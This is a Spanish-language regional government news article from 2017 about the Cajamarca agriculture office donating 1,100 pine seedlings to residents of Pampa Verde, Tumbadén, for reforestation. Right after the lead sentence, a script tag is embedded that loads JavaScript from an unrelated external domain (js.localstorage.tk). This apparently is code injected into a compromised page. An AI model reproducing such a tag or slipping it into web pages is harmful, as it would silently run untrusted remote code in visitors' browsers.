Ingresar

TUMBADÉN BENEFICIADO CON PLANTONES DE PINO

Jueves, 9 Noviembre, 2017 - 14:40
La Dirección Regional de Agricultura entregó mil 100 plantones a la población del anexo de Pampa Verde.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Los pobladores del anexo de Pampa Verde, distrito de Tumbadén (San Pablo), recibieron mil 100 plantones de pino para reforestar una hectárea de terreno de parte de la Dirección Regional de Agricultura Cajamarca, a través de la Dirección de Recursos Forestales y Fauna Silvestre; en el marco de la semana forestal.

Las autoridades y funcionarios del sector agrario felicitaron a los moradores del anexo Pampa Verde por sumarse al trabajo de reforestación, a quienes -además- agradecieron por asistir al acto de entrega de los plantones.

El director regional de Agricultura de Cajamarca, Miguel Ángel Vera Goicochea, señaló que en el marco de la semana forestal se visitó el anexo Pampa Verde para integrarlo en el programa de reforestación, explicando que -en este lugar- sembrarán pino. También indicó que se busca que día a día se replique este proceso en las demás zonas de la región Cajamarca.

Lo que se pretende es mejorar el micro clima y aprovechar los suelos que no son actos para la agricultura, ya que se tiene experiencias exitosas en cuanto a la reforestación, siendo una de las referencias más grandes de Cajamarca la Granja Porcón, por lo que el Gobierno Regional Cajamarca, a través de la Drac, apoya con estas plantaciones para cuidar el medio ambiente.

“Nuestro objetivo, este año, fue replicar  las experiencia positivas que se tienen, pero ya para el 2018 nos planteamos una meta muy ambiciosa de instalar un vivero forestal en cada provincia, con ello reforestar la región, otro de los objetivos es llegar a las comunidades nativas”, explicó Miguel Vera.

Se espera que la semana forestal incentive a la población, ya que se pretende sensibilizar, capacitar y dotar de conocimientos para que día a día la población se vea más comprometida con el medio ambiente y a través de estas actividades se contribuya en el cuidado del medio ambiente.

En otro momento, Teófilo Idrugo Mendoza, poblador del anexo Pampa Verde y beneficiado con la entrega de plantones, indicó que “es una gran experiencia que por primera vez en la historia se presenta en este lugar, además nos visita el director regional de Agricultura de Cajamarca con una ayuda muy importante para aprovechar los suelos que no son productivos o que no son apropiados para la agricultura, es por ello que se aprovecha para la siembra de estas plantaciones de pino”.

También se informó que “hace cuatro años se recibió el apoyo mancomunado de las agencias agrarias de Cajamarca y San Pablo, fruto de ello es que ya se tiene sus primeros frutos, las plantaciones que donaron están grandes, con esto ayuda a mejorar nuestros suelos”.

Las autoridades del sector agrario indicaron que esperan que esta experiencia se multiplique en otros lugares, que sigan sembrado arboles ya que es sembrar futuro para las generaciones que requieren de un ambiente sostenible y rentable y cuidado adecuadamente.

AdjuntoTamaño
PDF icon descargue 197.8 KB

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen